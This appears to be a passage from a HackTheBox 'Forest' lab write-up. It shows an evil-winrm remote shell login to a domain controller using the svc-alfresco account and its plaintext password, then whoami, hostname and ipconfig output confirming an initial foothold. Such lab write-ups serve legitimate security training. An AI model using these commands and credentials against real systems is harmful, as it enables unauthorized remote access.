WinRM
The svc-alfresco user is able to WinRMto the forest host
┌──(kali㉿kali)-[~/archive/htb/labs/forest]
└─$ evil-winrm -i $IP -u 'htb.local\svc-alfresco' -p 's3rvice'
Evil-WinRM shell v3.4
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
*evil-winrm* ps c:\Users\svc-alfresco\Documents> hostname
FOREST
*evil-winrm* ps c:\Users\svc-alfresco\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . :
ipv4 address. . . . . . . . . . . : 10.10.10.161
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : 10.10.10.2
tunnel adapter isatap.{e00b7e21-ee8e-4210-8c23-a108efc92167}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . :Initial Foothold established to the forest host via evil-winrm